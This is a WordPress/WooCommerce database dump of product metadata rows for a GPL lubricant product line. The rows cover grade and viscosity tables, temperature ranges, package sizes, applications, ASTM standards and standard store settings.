INSERT INTO `wp_postmeta` VALUES (8040, 847, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8041, 847, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8042, 847, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8043, 847, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8044, 847, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8045, 847, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8046, 847, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8047, 847, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8048, 847, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8049, 847, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8050, 847, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8051, 847, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8052, 847, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8053, 847, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8054, 847, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8055, 847, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8056, 847, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8057, 847, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8058, 847, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8059, 847, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8060, 847, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8061, 847, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8062, 847, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8063, 847, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8064, 847, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8065, 847, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8066, 847, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8067, 847, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (8068, 847, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (8069, 847, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (8070, 847, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8071, 847, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8072, 847, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8073, 847, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8074, 847, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8075, 847, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8076, 847, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8099, 847, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8100, 847, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8101, 848, '_edit_lock', '1475591875:2'); 
INSERT INTO `wp_postmeta` VALUES (8102, 848, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8103, 848, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8104, 848, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8105, 848, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8106, 848, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8107, 848, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8108, 848, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8109, 848, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8110, 848, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8111, 848, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8112, 848, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8113, 848, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8114, 848, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8115, 848, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8116, 848, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8117, 848, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8118, 848, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8119, 848, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8120, 848, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8121, 848, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8122, 848, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8123, 848, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8124, 848, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8125, 848, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8126, 848, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8127, 848, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8128, 848, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8129, 848, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8130, 848, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8131, 848, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8132, 848, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (8133, 848, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (8134, 848, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (8135, 848, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8136, 848, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8137, 848, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8138, 848, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8139, 848, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8140, 848, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8141, 848, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>NSF H-1 Rated</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8164, 849, '_wp_attached_file', '2016/08/shutterstock_159894728.jpg'); 
INSERT INTO `wp_postmeta` VALUES (8165, 849, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4988;s:6:"height";i:3292;s:4:"file";s:34:"2016/08/shutterstock_159894728.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_159894728-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_159894728-800x528.jpg";s:5:"width";i:800;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_159894728-768x507.jpg";s:5:"width";i:768;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_159894728-1600x1056.jpg";s:5:"width";i:1600;s:6:"height";i:1056;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_159894728-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_159894728-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_159894728-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_159894728-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (8166, 848, '_thumbnail_id', '849'); 
INSERT INTO `wp_postmeta` VALUES (8167, 848, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (8168, 848, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (8169, 847, '_thumbnail_id', '827'); 
INSERT INTO `wp_postmeta` VALUES (8170, 823, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (8171, 823, '_thumbnail_id', '845'); 
INSERT INTO `wp_postmeta` VALUES (8172, 850, '_edit_lock', '1475592195:2'); 
INSERT INTO `wp_postmeta` VALUES (8173, 850, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (8174, 850, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (8175, 850, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (8176, 850, '312_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>GPL Standard Grades</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69"><strong>200</strong></td>\r\n<td style="text-align: center;" width="69"><strong>201</strong></td>\r\n<td style="text-align: center;" width="69"><strong>202</strong></td>\r\n<td style="text-align: center;" width="69"><strong>203</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>204</strong></td>\r\n<td style="text-align: center;" width="69"><strong>205</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>206</strong>\r\n\r\n<strong>(H-1 Certified)</strong></td>\r\n<td style="text-align: center;" width="69"><strong>207</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Extreme Pressure Grades</strong></td>\r\n<td style="text-align: center;" width="69">210</td>\r\n<td style="text-align: center;" width="69">211</td>\r\n<td style="text-align: center;" width="69">212</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8177, 850, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="125"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td style="text-align: center;" width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (8178, 850, '318_custom_list_file', 'a:1:{s:32:"0f56c72f01d489ddf11bd7f17f74f118";a:3:{s:4:"name";s:20:"GPL Comparison Chart";s:4:"file";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (8179, 850, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (8180, 850, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8181, 850, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8182, 850, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (8183, 850, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8184, 850, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (8185, 850, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (8186, 850, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (8187, 850, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (8188, 850, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8189, 850, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8190, 850, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8191, 850, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (8192, 850, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (8193, 850, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (8194, 850, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (8195, 850, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8196, 850, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8197, 850, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (8198, 850, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8199, 850, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (8200, 850, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (8201, 850, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8202, 850, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8203, 850, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (8204, 850, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (8205, 850, '_ywtm_content_tab_description', '&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (8206, 850, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8207, 850, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (8208, 850, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (8209, 850, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (8210, 850, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (8211, 850, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Handles</li>\r\n 	<li>Moving Parts</li>\r\n 	<li>Seals</li>\r\n 	<li>Connectors</li>\r\n 	<li>Rollers</li>\r\n 	<li>Automotive Interiors</li>\r\n 	<li>Fittings</li>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8212, 850, '719_default_editor', '<ul>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D6184</li>\r\n 	<li>NSF H-1 Rated</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (8235, 851, '_wp_attached_file', '2016/08/shutterstock_92739160.jpg'); 
